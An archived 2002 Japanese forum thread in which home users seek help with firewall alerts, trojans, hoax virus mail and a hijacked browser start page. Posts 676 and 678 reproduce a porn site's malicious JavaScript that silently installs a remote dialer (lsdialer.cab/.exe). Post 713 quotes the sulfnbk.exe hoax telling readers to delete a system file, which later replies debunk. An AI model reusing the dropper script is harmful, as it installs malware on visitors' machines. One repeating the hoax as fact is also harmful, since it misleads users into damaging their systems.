ノートンにしたです。

574 :名無しさん@お腹いっぱい。:02/01/01 04:21
2002体験版をDLして、インストしたのですが、
黒氷があるから、インストできません、って出ます。
体験版をDLしたら、〜exe.ファイルしかないです。
これって、黒氷入っているうちは、ウイルスバスター2002は、
インストできないということでしょうか?
何かやりようがあるのでしょうか?

575 :名無しさん@お腹いっぱい。:02/01/01 04:51
>>574
そのままやん

576 :名無しさん@お腹いっぱい。:02/01/01 05:08
BlackICE試用版を昨日から使ってるんですが、teri鯖にアクセスすると
何故かIPとリモホが正確に抜かれHTTP attackと表示されます。
そして「【侵入の疑い】不審なトラフィックが検出されました」とメッセージが。
あの鯖には何かあるのでしょうか?

577 :名無しさん@お腹いっぱい。:02/01/01 05:24
>>576
そういうのはBlackICEスレで、HTTP attack で検索してみてくれ。

578 :576:02/01/01 05:29
>>577
概要  侵入の可能性があります。

詳細  侵入者は、特殊な方法でデータ パケットを構成し、
     攻撃したシステム上で不正なコードを実行しようとしています。

不思議なのはteri鯖にアクセスすると必ずそうなる事です。
あの鯖のスレを読み込む時に覗かれてるのかと思って。

579 :576:02/01/01 05:30
BlackICEスレで検索してみます。どうもでした。

580 :名無しさん@お腹いっぱい。:02/01/01 08:48
>>541だけど。
また来た。166.114.65.***
BOLNET(?)のやつから。

NetBIOSにアクセスしてくる部外者ってなに?

581 :名無しさん@お腹いっぱい。:02/01/01 13:11
>>555
近隣の住人に晒されたくなければ入れろ

582 :名無しさん@お腹いっぱい。:02/01/01 22:13
ちょっと質問させてください
環境はOS W2Kとウィルスバスター2002とルータでネットをやってます。
数日前より同じIPがファイアウォールのログにのるようになりました。
で調べてみるとドライブC&Dが知らぬ間に共有されてるではないですか!
こういうのを防ぐにはどうしたらいいですかね?

583 :名無しさん@お腹いっぱい。:02/01/01 22:23
>>582
回線切ってウイルスチェック。

584 :名無しさん@お腹いっぱい。:02/01/01 22:28
いや、ウイルスチェックはやったけど問題なし。
もちろん最新のパターンファイルね
今もがんがん来てるんですけど・・・

585 :名無しさん@お腹いっぱい。:02/01/01 22:34
>>584
自分以外がPC使わないで知らぬ間に共有されてるとしたら
ウイルスにやられたかハックされたかじゃないか?

586 :名無しさん@お腹いっぱい。:02/01/01 22:34
>>582

スパイウェアはウイルスチェックは無意味。
あきらめてフォーマットしなさい

587 :名無しさん@お腹いっぱい。:02/01/01 22:36
ウイルスチェックをだますウイルスがあるし、
ウイルスチェックやったからって万全ではなし。
最良の方法はフォーマットだよふぉー・ま・っと

588 :名無しさん@お腹いっぱい。:02/01/01 22:37
なんか怪しげなサイト行ったり怪しげなファイル実行したりした覚えはないのか?

589 :名無しさん@お腹いっぱい。:02/01/01 22:41
>>582
どういう手順で共有しない設定をしたの?

590 :582:02/01/01 22:41
うさくさいとこにはよくいきますが、変なEXEを実行したりとかはないなぁ
あ、ad-awareも使ってみました、異常なしでした

591 :名無しさん@お腹いっぱい。:02/01/01 22:42
>>590
ウサクサイところ言ったなら可能性はある。
だから心配ならフォーマットしなさい。

****終わり****

592 :名無しさん@お腹いっぱい。:02/01/01 22:44
じゃあうさんくさい所に行った時になんか仕込まれたと。

593 :名無しさん@お腹いっぱい。:02/01/01 22:44
>>590
てめぇウザイ。
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと
フォーマットだよふぉー・ま・っと

何回も言わせるな!

594 :582:02/01/01 22:47
共有はドライブのプロパティーで見たら共有するになってた。
うさんくさいところていってもなぁ

595 :名無しさん@お腹いっぱい。:02/01/01 22:49
>>594
Windows2000はデフォルトで共有設定になるのだが

596 :582:02/01/01 22:49
フォーマットって何?

597 :名無しさん@お腹いっぱい。:02/01/01 22:49
だから心配ならフォーマットリカバリーで解決です。
ワカリマシタカ?アナタニホンジンデスカ?

598 :名無しさん@お腹いっぱい。:02/01/01 22:50
>>594
ナライナイヨ!それはシステムの共有だろ

599 :名無しさん@お腹いっぱい。:02/01/01 22:50
煽りはさておき、共有はしないにかえてもまた共有するになってた

600 :なんk:02/01/01 22:51
なんかね、今月すごいのくるってどっかのHPでみた。
IE6にしないといけないのかな?
SPじゃだめらしい。
情報きぼんむ

601 :名無しさん@お腹いっぱい。:02/01/01 22:51
582はインポ

602 :名無しさん@お腹いっぱい。:02/01/01 22:52
>>599
それはwindows2000の仕様

ここで勉強↓
http://homepage2.nifty.com/winfaq/w2k/

603 :名無しさん@お腹いっぱい。:02/01/01 22:52
>>599

あっそー良かったね。共有でいいじゃん。

604 :名無しさん@お腹いっぱい。:02/01/01 22:53
ほんと582は馬鹿

605 :インポ:02/01/01 22:53
ん〜とりあえずセキュリティーのサイトいって勉強してくる
レス下さった方ありがとう

606 :名無しさん@お腹いっぱい。:02/01/01 22:55
[スタート]−[ファイル名を指定して実行] から regedit を起動します。
HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services \LanmanServer \Parameters を開きます。
[編集]−[新規]−[DWORD 値] をクリックし、AutoShareServer を作成します。
(AutoShareServer は Server 以上で有効です。NT Workstation や Windows 2000/XP Professional では AutoShareWks を作成します。)
AutoShareServer または AutoShareWks のデータを 0 に設定します。

607 :インポ:02/01/01 23:02
>602 本当だ・・・しらなかった
今再起動したら、共有するに変わってるや
皆様すいませんです
あとadminにもパスかけ忘れてた・・・

608 :名無しさん@お腹いっぱい。:02/01/02 00:47
すみません、Win板でも訊いたんですが板違いだったようなので
こちらで質問させていただきます。マルチすまそ・・・。
ポート1025が常にListenになっているんですが、これはWindowsのシステム
かなんかが開けているんでしょうか?ちょくちょくnetstat -aで
確認してるんですが、どこかと接続していた事はないです。

ずっとListenになってるだけのようなんですが・・blackjackという
ウィルスの仕業なんでしょうか?シマンテックとトレンドマイクロの
オンラインスキャンをしてみましたが、何も出ませんでした。
OSはWin98(2、3日前にリカバリしたばかりです)、ZAを入れています。どなたか教えてください・・。

609 :名無しさん@お腹いっぱい。:02/01/02 00:57
>>608
エプソンのプリンタドライバ入ってるだろ?

610 :名無しさん@お腹いっぱい。:02/01/02 01:03
>>609
レスありがとうございます。プリンタは持ってないんですが・・
エプソンのプリンタが使うポートなんですか・・周辺機器というと
NTTのTAくらいしか思い浮かばないです・・。

611 :609:02/01/02 01:08
SAgent2がそのドライバ。エプソンにも確認済み。
プリンタ管理ユーティリティだとさ。
・・・・バグについてはデンワのオネェさん教えてくんなかった。
不安なら削除しても動くらしいけど、インク残量とか表示できなくなるって。。。

612 :609:02/01/02 01:11
げっ、プリンタ無しか。。。

613 :541:02/01/02 10:58
またきた。いつも同じような時間帯。

166.114.65.***

だれかわかる人説明キボンヌ

614 :名無しさん@お腹いっぱい。:02/01/02 12:03
>>613
知ってどうする?
生兵法は怪我の元。
防いでくれてるなら安心して忘れとけ。

615 : :02/01/03 13:18
2ちゃんねるの特定の板に書き込むことが出来ないです・・・。
クッキーをオンにして・・・とかいわれてもcookie有効になってるし。

何をどうしたら書きこめるようになるんでしょうか?

616 :名無しさん@お腹いっぱい。:02/01/03 15:48
>>464
どっかの掲示板からのコピペですが

WininitsはWindows起動時に動作して、起動するごとにファイルを一種類ずつ削除する。
.log→.txt→.na2→.snm→.wab→.wa~→.dbx→.htm→html→.gif→.jpg→.avi→.mov
→.ani→.cur→.ico→.lnk→.doc→.xls→.ttf→.ttc→.fon→.ini→.exe→.dll

駆逐するためには
レジスリHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\wininits
を削除して、
c:\windows\Wininits.exe
を削除。

…らしいです。
放っておいたら途中アドレスもメール送受信のフォルダも消えるってこと?怖。

617 :名無しさん@お腹いっぱい。:02/01/03 17:40
>616
ありがとうございます。
Wininits自体が削除していたんですね・・・
もうフォーマットしてしまうつもりだったんですが、早速直してみます。
.htmまで消えてなくて良かった・・・
ひたすら感謝です。


>572
わざわざ目を通していただいてありがとうございました。

618 :616:02/01/03 18:48
>617
思ってたほどかわいいものじゃなかったみたい。
画像鑑定スレの非公式BBSでそこそこ深刻な話題になってました。
http://isweb34.infoseek.co.jp/diary/narrowb/cgi-bin/ahh255b2/
ここの雑談スレッドだったかと。

619 :名無しさん@お腹いっぱい。:02/01/03 21:03
http://dreamisland.mens.cc/sup01/sup01007/images/
の中にあるdatファイルと0kのjpegファイルってぶらくらですか?
どなたか教えてください。

620 :名無しさん@お腹いっぱい。:02/01/03 21:09
>>619 みんなに踏ませたいのか?ソース見て判断しろよ。

621 :maiko:02/01/03 21:14
ここで紹介されている
ぴんぐってなんですか?

http://mypage.naver.co.jp/sharp2601/

622 :名無しさん@お腹いっぱい。:02/01/03 21:19
619です。
datファイルをおとしたのですが、
動画がみれず、再起動してみてくださいとでたので・・・
ちなみにウイルスソフトにはひっかかりませんでした。

623 :464:02/01/03 21:27
>617
見てきました。
自分もWininits削除してみたらおかしくなったので再構築中ですが、
やはりフォーマットするしかないですか・・・(泣)
シマンテックは何やってるんだろう?

624 :464:02/01/03 21:31
とりあえず、今のところワクチンソフトがないみたいなので
「Start and Stop」でWininitsを起動させないのがベストみたいですね。
メモ帳のアイコンが変化していたら即止め安定かと。

625 :名無しさん@お腹いっぱい。:02/01/04 00:04
初めて書き込みをさせてもらいます。
iアプリで通信を行うときはJava独自の暗号化を行って
更にSSLで通信の暗号化を強化させるという話を聞いた事あるのです
が、Java独自の暗号化というのはSSLとは違うという事ですよね?
Java独自の暗号化について詳しい方いませんか?
ご存知の方、よろしくお願いします。

626 :奈々氏:02/01/04 07:25
間違えてIP晒してしまったら,トロイを仕掛けたと言われました
ウィルス対策ソフト持ってません
どうしたらいいんでしょう!!!

627 :名無しさん@お腹いっぱい。:02/01/04 08:13
>>626
どこで晒してしまったの?
場所にもよるから、晒した場所と
あなたのOSがわからないと
コメントのしようがないよ。

628 :名無しさん@お腹いっぱい。:02/01/04 08:17
>>626
対策ソフト買ってこいよ
PC買ってから今まで何やってたんだ?

629 :名無しさん@お腹いっぱい。:02/01/04 10:59
社内LANのパケットを除いている馬鹿がいたので、LAN内部の通信も全面的に
暗号化されることになりました。
で、Apach-SSL自前CAを立てたんですが、CAの証明書を全マシンに入れるのも
CA使わずにサーバーの証明書を全マシン入れるのもセキュリティー的には
社内LANレベルではあまり変わらないですよね?

630 :奈々氏さん626:02/01/04 11:09
OSはWIN98、晒した場所はモー狼板
http://love.2ch.net/test/read.cgi/morningcoffee/1010091944/
の217

631 :奈々氏さん626:02/01/04 11:10
じゃなくて271だった!

632 :名無し募集中。。。:02/01/04 12:31
さっさと答えれ

633 :名無しさん@お腹いっぱい。:02/01/04 13:09
>>632
どの質問に?

634 :名無しさん@お腹いっぱい。:02/01/04 13:35
>>630
対策ソフトは買いに行ったか?
早く行け

635 :名無しさん@お腹いっぱい。:02/01/04 14:37
板違いかもしれませんが詳しい人がいると思いますので
いろいろなホームページ等で登録とかをするときクッキーをonにしてるのに
「認証に失敗しました」とか「クッキーをonにしてください」とかでるのは
なぜでしょうか?登録とか掲示板の書き込みができないときがあるんです!
教えてください 初心者ですいません。
windows me ノートン2001入れてます(関係ないかも)

636 :名無しさん:02/01/04 14:41
>>635
私も同じ環境でしたが、たまにそういう現象がありました。
現在はウィルスバスター2002にアップしているせいか、そういった
現象にはお目にかかっていません。

637 :名無しさん@お腹いっぱい。:02/01/04 15:00
JS_EXCEPTION.GENに感染しました。
検索エンジンで検索してみたところ
IEのスタートページが書き換えられる・・・との事ですが、
スタートページは無事だったんですが
自分の場合、メーラーのアカウント情報が消えていました(EdMaxフリー版)。

ウィルスバスター2002でファイルを見つけ削除→Ad-awareで怪しい物無し→
再度バスターで検索→ウィルス0でした。

もう安心して良いのでしょうか?初めて感染したのでめちゃくちゃ怖いです。
自分より人に迷惑かけたら・・・ほんと不安です・・・・。

環境はWinXP・IE6です。

638 :名無しさん@お腹いっぱい。:02/01/04 15:10
>626
チト時間がかかるがシマンテックのセキュリティチェック
http://security1.norton.com/ssc/sc_ipcheck.asp?j=1&ax=0&langid=jp&venid=sym&plfid=20&pkj=CYIVSKVYRMHCGVRVRMN

639 :名無しさん@お腹いっぱい。:02/01/04 15:13
>>637
不安ならフォーマット>クリーンインストールが基本。

640 :608:02/01/04 19:27
>>608なんですが、どなたか分かりませんか?

641 :608:02/01/04 19:32
netstat -anではこうなります。

Proto Local Address     Foreign Address    State
TCP  127.0.0.1:1025    0.0.0.0:0       LISTENING
UDP  127.0.0.1:1025    *:*          LISTENING

642 :名無しさん@お腹いっぱい。:02/01/04 19:33
>>640
オンラインスキャンは気休め。
リカバリは無意味。
>>639

643 :名無しさん@お腹いっぱい。:02/01/04 20:52
>464
「Start and Stop」とは何処にあるんでしょう?googleで探せなかったんですが・・・

644 :63 ◆ZzzC2NPs :02/01/04 21:55
>>71
アドバイス、サンクス

645 :名無しさん@お腹いっぱい。:02/01/04 23:14
友達に俺のところにhappytimeっていうウイルスが来たからお前のとこにも行くと思う
って言われたんですが・・どんなウイルスなんすか?
どう対処すればいいんですか?

646 : :02/01/04 23:20
>>645
googleで「ウイルス happytime」で検索。

終了

647 :名無しさん@お腹いっぱい。:02/01/05 00:20
>>629
正直、この手の高度な質問に回答できるヤシは
この板にはいません(w
通信技術板のほうがレスつきやすいですよ。

648 :頼むから教えて!:02/01/05 00:23
この前2ちゃんねるに貼り付けてあったリンクにいったら「本日あなたが
最初の犠牲者です」と書かれたリンクにあたり、どうやらウイルスに感染したみたい?で
それからどこかのサイトにいく度にダイアログボックスが開かれて「情報が他人に漏れる可能性があります」
と聞いてきます。一度初期化したのですが直りません。ちなみにそのリンクには
IPアドレスが漏れるとか、メールアドレスが漏れるとか書いてあり、明らかに
誰かが悪意を持って仕掛けていたと思われるのですが・・・初期化しても
直らないので明日修理に出すつもりなのですが、わかる方いますか?具体的
な直し方を教えてほしいのですが。初心者なのでどういう仕組みでIPが
漏れるのかもわかりません。

649 :名無しさん@お腹いっぱい。:02/01/05 00:26
>>648
使用OSと「初期化した」の具体的内容を述べよ

650 :105.kzw.freecom.ne.jp:02/01/05 00:32
>>648
IPアドレスなんていくらでも漏れる
あなたが行くサイトの管理人にはバレバレだ

たぶんUser-Agentが出るサイトに言っただけだろ
JAVAスクリプトでしかけがしてあるサイトとか

>>649さんの内容に答えてくれ
あとウイルス対策ソフトも持たず(知らず)にネットに繋ぐのは問題外
人格を疑われるぞ

651 :頼むから教えて!:02/01/05 00:33
windows meで工場の出荷状態にしてリカバリCDROMで初期化したんですが

652 :名無しさん@お腹いっぱい。:02/01/05 00:34
>>648
そのリンク、ブラウザの下に「ダウンロード中??%」のような表示が
出るやつか? 少し前によく張ってあったのは、ただの脅しJavaScript
だったんだけどね。

ダイアログボックスって、書き込みフォームで送信したときに出るやつ
じゃないの? ブラウザのセキュリティを高にしたらデフォルトで出る。

653 :頼むから教えて!:02/01/05 00:44
年末に張ってあって「ダウンロード中」っていう表示が1秒くらい出て
(ADSL8メガ使用)それからどこのサイトにいくにも(Yahoo・nifty等)
ダイアログが開かれるんです。これってウイルスの仕業じゃないのかな?
こえゆう風に「インターネットで情報を送信する時にその情報をほかのひとから
読み取られる可能性があります。続行しますか?」ではい・いいえの項目が
でるのですが・・・

654 :名無しさん@お腹いっぱい。:02/01/05 00:53
>>647
かなり住人かぶってるけどね。なんでだろ?

655 :初心者です:02/01/05 01:00
日付: 02/01/04 時刻: 22:27:55
規則「Default Block NetBus Trojan」が *****,NetBus をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは*****,NetBus
リモートアドレス、 サービスは 211.109.101.133,2668
プロセス名は N/A

このサーバ(韓国)らしいのですが、こわいです。
警告がでるたびトラウマになってしまいます。
何か いい方法がないでしょうか?

656 :名無しさん@お腹いっぱい。:02/01/05 01:13
WinXP+NIS2002とWin2000+BIっていう組み合わせなんだけど、
それぞれNISとBIを止めないとファイルの共有ができない。
セキュリティソフト稼働させたままファイルの共有させる方法はどうすればいい?

657 :jkl:02/01/05 01:17
win98でIE5.5使ってるんですが、立ち上げた時に表示されるページがア
ダルトページになります。IEのメニューから、「ツール」の「オプション」
で何回も設定しなおしても表示されます(PC再起動後)。さらに、検索ボタン
を押してもアダルトページが表示されます。これって治らないんですかね?

658 :名無しさん@お腹いっぱい。:02/01/05 01:22
>>653
呆れたわヽ(´ー`)ノ
IEの設定でそう出てくるだけ。気にすんな。

659 :トラ(゚д゚)ウマー:02/01/05 01:23
>>655
あ〜。。メインウインドウ開くのら。
ファイアーウォール->インターネットアクセス制御->(右上の)設定、プルダウン。
->トロイの木馬の設定->NetBusトロイの木馬のデフォルト遮断、反転。
(下部の)修正->(上部の)追跡・「この規則をどう使いますか」のチェックボ
ックスをとりあえづ全部OFF。
コレで警告は出なくなると思うけろ。。。

660 :ななしん:02/01/05 01:28
>655
ブロックしてるのだから、気にする事は無い。
また、たとえブロックされていなくても、貴方のマシンにトロイが無ければ大丈夫

661 :初心者です:02/01/05 01:31
>>659
ありがとう。(感激です。
で、相手先を追及するのは困難ですか?
ひんぱんにあるんです。で、韓国語サイトで翻訳してサーバの
管理者にメールだすんですが、さっぱり無回答なのです。

662 :トラ(゚д゚)ウマー:02/01/05 01:31
>>655
うっ、、、つか、、、ノーdパソナルファイアウォールは2001なのれすか??
だとすると>>659のやり方は2002の方なので参考にならないのら。。。
2001ってどうだったっけら?
たしか、「拡張オプション」からフィルタリングルールのカスタマイズできた
と思ったけろ。。

663 :初心者です:02/01/05 01:35
>>660さん ありがとう。(感激です。

664 :初心者です:02/01/05 01:38
>>662さん
2001です。とにかくやってみます。
で、相手先を追及するのはやはり困難ですか?

665 :660:02/01/05 01:40
>661
韓国語で翻訳して送るより、英語で書いた方が良いかも知れない。
ほら、英語を日本語に訳してくれるサービスの翻訳文て、いい加減なのも多いでしょ。

666 :名無しさん@お腹いっぱい。:02/01/05 01:40
>>664
無駄

667 :名無しさん@お腹いっぱい。:02/01/05 01:42
下手に追求してさらなる被害の拡大を見る人が多いんだよ(笑)

668 :トラ(゚д゚)ウマー:02/01/05 01:45
>>661
そんなに頻繁なら、自分の加入してるISPに事情説明して、交渉代行してもらう手も有るだろうけろ。
ログは、一応出した方が良いのかな。動いてくれるかどうかは解らないのら。。

ぁ〜。。つか、大きな声ぢゃいえないけど、前に自分も面白がって時々スキャン掛けてた事有るのら。
漏れの加入してるISPは、当時何も言ってこなかったにょ〜〜〜
まぁ、所詮漏れはへたれだから、相手は選んでスキャンしたのら(w

669 :初心者です:02/01/05 01:46
>>665さん 今度は英語でやってみます。(韓国に英文って思いもつななかった)

>>666さん 無駄とはどんなに、調査しても解からない ということですか?

670 :657:02/01/05 01:53
ちなみに出てくるページは
ttp://sm.sexhound.comです。

たぶん踏まない方がいいかと。

671 : :02/01/05 02:00
>>657
lsdialer.exeとかどっかにないか?
msconfigのスタートアップにも有るはずだから、それも消せ。

672 :名無しさん@お腹いっぱい。:02/01/05 02:01
>>670
多分、、、JS.Exceptionなのら。。。
漏れ、ソース見飽きたから要らないから行かないけろ。

673 :初心者です:02/01/05 02:02
セキュリティ板の方って、なんかデンジャラスそうで....。
でも、こんな初心者への回答も何行もレスしてくれて、ありがとう。
建築板をうろついている女建築士です。建築のことでお困りの際は
セキュリティ板よりって書いてスレ建ててください。勇士達がたくさんいます。
今回はサンキューです。(^.^)

674 :名無しさん@お腹いっぱい。:02/01/05 02:11
>>673
をを!いい響きだ!! >女建築士
こ、今度お茶でもどうれすか〜〜!!
・・・だ、ダメなら現場でドカチンバイトで使って欲しいれすぅ〜〜

675 :初心者です:02/01/05 02:14

それとこれとは別です。やっぱデンジャラス!!

676 :>657 勝手にCABを実行?:02/01/05 02:14
<!--IPT language=JavaScript
var cabpath='http://sm.sexhound.com/lsdialer.cab';
var exepath='http://sm.sexhound.com/lsdialer.exe';

var BName=navigator.appName;
var BVer=parseInt(navigator.appVersion);
function loadit()
{

if(BName=='Microsoft Internet Explorer'&&BVer =2)
{
document.write("<OBJECT WIDTH=1 HEIGHT=1 CLASSID=
\"CLSID:2C38A62E-D257-40e8-8BB7-5624E38FEB0A\" CODEBASE=\""+cabpath+"\" <\/OBJECT ");
}
else
{
document.write("<SCRIPT window.open\(\""+exepath+"\",\"_blank\",\"height=1,width=1\")<\/SCRIPT ");
}

}
loadit();
//--
</SCRI-->
<!--IPT language=JavaScript
<!--
var exit = true;
setInterval("x()",5);
function x(){window.status="All right reserved. Copyright by sm.sexhound.com ... "}
//--
</SCRI-->

677 :名無しさん@お腹いっぱい。:02/01/05 02:14
>>670
onunloadで書き換えてるのかも。
Windows起動後、コンパネのインターネットセッティングでスタートページ直せばおっけかも。

678 :>657 続き:02/01/05 02:17
<!--IPT language=JavaScript
<!--
var exit=true;
function quit()
{
if (confirm('CLICK OK to DOWNLOAD LOLITAS PORN VIDEO !!! '))
{
window.open("http://sm.sexhound.com/lsdialer.exe", "s4sdcd9", "height=450,width=550,scrollbars=no,resizable=no");
}
if(exit)
{

nwa=window.open("http://sm.sexhound.com/index2.html","234s2");
window.focus();
}
}

// --
</SCRI-->

679 :657:02/01/05 02:22
>>671さん,672さん,676さん,677さん、678さん
ありがとうございます。なんとかやってみます。

680 :674:02/01/05 02:27
ふっ、フラレタのら〜〜〜

681 :2C38A62E-D257-40e8-8BB7-5624E38FEB0A:02/01/05 02:32
http://hotel.prosa.dk/~tsj/hardware/dell8100me/WinMeSysInfo.txt

682 :名無しさん@お腹いっぱい。:02/01/05 02:38
惜しかったね(ё_ё)>>680
解決前に交渉しとけば…セキュ板の評判がた落ち?(ワラ

683 :名無しさん@お腹いっぱい。:02/01/05 02:49
結局、ヂャバoffしとかないのまづいのら。。。

2C38A62E---がlsdialer.cabのCLSIDなのら。。>681
という事は、このDELLコンの持ち主TORBENは。。。(w

684 :>657 続き:02/01/05 02:55
確証はないが、Microsoft JavaVM経由でWSH ShellObjectインスタンスを生成‥‥とかいう穴らしいので、
IE以外は影響受けないんじゃないか、という話。

685 :680:02/01/05 02:55
>>682
良いのら。。。コレで(w
さすが女建築士。。。簡単に乗らないところがエライ!
ますます萌えたぢょ(ポッ

686 :657:02/01/05 03:05
皆さんありがとうございます!なんとか治りました!
マジでうれしいです。すげー!

687 :>686 治し方を教えてくれ!:02/01/05 03:20
lsdialerを削除?

688 :名無しさん@お腹いっぱい。:02/01/05 06:05
私も657さんと同じ症状です。
みなさんの言うとおりにしましたが、直りません。

もう少し詳しくお願い致します。

689 :若葉:02/01/05 06:56
私も688や657さんと同じ症状です。
私ももう少し詳しくお願いしたいのですが…

690 :若葉:02/01/05 07:34
ここがかなり参考になりそうです。
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=all_read&no=112138&page=0
頑張ってみます。

691 :名無しさん@お腹いっぱい。:02/01/05 09:38
新年早々、送信者欄もタイトルも空欄の添付ファイル付メールが届いていました。
『あやしい』って思って見ずに削除したんですが、大丈夫なんでしょうかねぇ・・・。

692 :名無しさん@お腹いっぱい。:02/01/05 11:03
>>691
新年早々ウイルス対策ソフトも買ってないあなたがあやしいよ

693 :名無しさん@お腹いっぱい。:02/01/05 12:51
>>692
新年早々笑った。

694 :名無しさん@お腹いっぱい。:02/01/05 12:53
さっきタスクに入ってたMXを最大化したらなぜかサイズが5分の1ぐらいに縮小されてた。
身に覚えがないしこんなこと初めて。これってトロイかなにかで遠隔操作されてますか?

695 :名無しさん@お腹いっぱい。:02/01/05 13:03
>>694
これだけ2ちゃん内でも騒がれてるのにMXをやっているあなたが信じられない
遠隔操作でもウイルス繁殖でもなんでもやられてくれ

696 :名無しさん@お腹いっぱい。:02/01/05 13:05
質問ですが宜しくお願い致します。
IE6、NIS2002を使っています。
2チャンネルで或るスレッドを見ようと思い
スレッド1欄を開き、クリックすると開きますよね。
その時、“トロイの木馬”の警告が出たことがあるのですが
そのスレッドには“トロイの木馬”が仕掛けられていた
と言う事ですか?
それと、お気に入りの所に
なんか知らないうちに“カメラ”のようなマークが出ていたのですが
これは何でしょうか?知らないうちにあったので削除しましたが。
ご存知の方おられましたら宜しくお願い致します。

697 :名無しさん@お腹いっぱい。:02/01/05 17:23
あの・・、ウィンドウズを立ち上げる時、パスワードを入れないと
いけないようにする方法があるって聞いたことがあるんですけど
それと同じように、ソフトにも、パスを求めさせることって
できるのでしょうか?
たとえば、メーラーを起動させるときに、パスワードを入れないと
起動できないとか・・・。
あと、ファイルとか・・。

698 : :02/01/05 17:25


699 :名無しさん@お腹いっぱい。:02/01/05 17:52
ちょっとあっち方向の(エロ)とこに行ったら、
XMildとかいうハンバーガーみたいなアイコンのがデスクトップにできて、
削除しても削除しても復活してしまうんです。
「モデムの選択」とかいうウインドウも勝手に出てくるし。
Q2か何かにつなぐのだと思うんですけど・・・
どうしたらいいか教えてください。

700 :名無しさん@お腹いっぱい。:02/01/05 17:57
しらん

701 :名無しさん@お腹いっぱい。:02/01/05 18:01
なんかいじくってたら直りました。どもでした。

702 :名無しさん@お腹いっぱい。:02/01/05 18:02
>701 >699です

703 :名無しさん@お腹いっぱい。:02/01/05 18:51
>>697
やりかたによっては可能でしょ

704 :名無しさん@お腹いっぱい。:02/01/05 19:08
>>703
たしかに可能だけど、
>>697 はWin9xっぽいので、
たぶんやっても無駄っぽいな。
抜け道だらけになりそう。

705 :名無しさん@お腹いっぱい。:02/01/05 19:26
>>704
起動させるのにパスワードが必要な設定の出来るソフトってあるにはあるよね。
いないときにいじられたくないのだったら 、スクリーンセーバーにパスワードを設定して、
離席するときには手動で起動するってのが一番確実かな?

706 :名無しさん@お腹いっぱい。:02/01/05 19:26
サブアドからの気持ち悪いメールが毎日入ってきます(泣)
相手の特定とかげきますでしょうか?

707 :名無しさん@お腹いっぱい。:02/01/05 19:26
もっとも、起動時にパスワード入力しないでも入れるような状態だと、
全く無意味だよね(笑)

708 :名無しさん@お腹いっぱい。:02/01/05 19:27
>>706
げきません。

709 :名無しさん@お腹いっぱい。:02/01/05 19:34
>>671-672
ちょっとお訊きしたいんですけど、
JS.ExceptionってAVGで検出できる?

710 :名無しさん@お腹いっぱい。:02/01/05 20:31
>>708
いいレスだ。

711 :名無しさん@お腹いっぱい。:02/01/05 20:51
>>705>>707
そうそう。離席するときに画面をパスワードロックする
フリーソフトがあるんだけど、それをスタートアップに
入れると見かけ上は、起動時にパスワード入れないと進めない。

けど、SHIFTキー押しながら起動で簡単に回避できるし、だからって
レジストリの Microsoft\Windows\CurrentVersion\run とかに
登録してみても、セーフモード起動でレジストリキー削除で一発。
結局あれだ。Win9xは設計がそのようなことに向いてないのよ。。。

712 :名無しさん@お腹いっぱい。:02/01/05 20:59
今見ると>>697には
>メーラーを起動させるときに、パスワードを入れないと
>起動できないとか・・・。
…て、書いてあるし。これだけはOEのユーザー管理機能でも
出来たような…。

713 :u-ta ◆UTA35.4M :02/01/05 21:37
下のようなメールが来たんですが、
このsulfnbk.exeっていうの消したらヤヴァイすか?


>>お正月早々に申し訳ございませんが、私の友達のパソコンに
>>ウイルスが進入いたしました。
>>
>>アドレスリストに入っている人全員に、自動的に感染してしまうと
>>いう悪質なウィルスです。
>>
>>ウイルスに先にかかった知り合いのアドレスリストに、上記の方のアドレスが
>>あったのでその方も感染しました。
>>
>>ですからみなさんのコンピューターの中に既にウイルスがいます!!!!!
>>
>>(下記はその方の私宛のメールです)
>>十四日間は眠っているのですが、それを過ぎてしまうとハードドライブを
>>壊してしまいます。
>>
>>私もこのメールを受けたときはびっくりしました、そして実際に検索した所、
>>そのファイルがあり下に表示してあるステップに従ってウイルスを駆除しました。

>>
>>本当に申し訳ないんですが、今直ちにウイルスを駆除してください。
>>そしてあなたのアドレスリストにある人は既に感染していますので、
>>このメールをリストにある全員に送っていただけないでしょうか、
>>本当に申し訳ございません。
>>
>>  1. スタートメニュー → 検索 → ファイルやフォルダ
>> 2.検索条件の名前の欄に”sulfnbk.exe”と打つ − これがヴィルスの名前
>> 3.探す場所はCドライブであることを確認する
>> 4.検索開始を押す
>> 5.検索結果で見つかったファイルが黒いアイコンであればそれがヴィルス
>>   ファイル名が”sulfnbk.exe”であることを確認する 絶対に開かないでく

>>さい!!
>> 6.そのファイルを右クリック → 「削除」
>> 7.ごみ箱に移してもいいですかというメッセージが出てくる → 「はい」
>> 8.デスクトップ(一番最初の基本画面、全てのアイコンがある画面)に行って

>>   ごみ箱のアイコンを右クリック → 「ごみ箱を空にする」
>> 9.もしこのヴィルスがあなたのコンピューターから検出されたらあなたの
>>   アドレスに入っている人全員にこのメールを送ってください。
>>   それがこのヴィルスのシステムです。
>> 10.もし検索でこのヴィルスが検出されなかった場合は「新しい条件」で
>>   試して見てください。
>>
>>このメールは、チェーンメールみたいに送って下さい
>>よろしくお願いします

714 :はぢめ君:02/01/05 21:43
>>713
「sulfnbk.exe HOAX」でYahoo検索掛けてみ。。
結構外出なデマ。。

715 :名無しさん@お腹いっぱい。:02/01/05 21:44
新手のチェーンメールやな。

716 :709:02/01/05 21:45
誰か教えれ・・。AVGスレで訊いたほうがいいか・・。

717 :u-ta ◆UTA35.4M :02/01/05 21:48
>>714 thx
がいしゅつでしたかスマソ
シマテクのサイトで復元の仕方も書いてありました

718 :名無しさん@お腹いっぱい。:02/01/05 21:50
そだな。>>716
今AVGユーザーが居らんのかもしれんが。

719 :709:02/01/05 21:54
>>718
あんがと。そうしますです。

720 :名無しさん@お腹いっぱい。:02/01/05 21:56
>>716
漏れは、取り敢えず持ってない。。>AVG
んだから、解らない。。
すまにょ。。サイトにウイルスデータベース置いてあれば解るんだけど。。
なんか、無いみたい。。

721 :名無しさん@お腹いっぱい。:02/01/05 22:25
>>717
「sulfnbk.exe」に関するデマメール情報
http://www.ipa.go.jp/security/topics/alert130530.html

消してしまった人はこちら。
http://www.symantec.com/region/jp/sarcj/data/s/sulfnbk.exe.warning.html

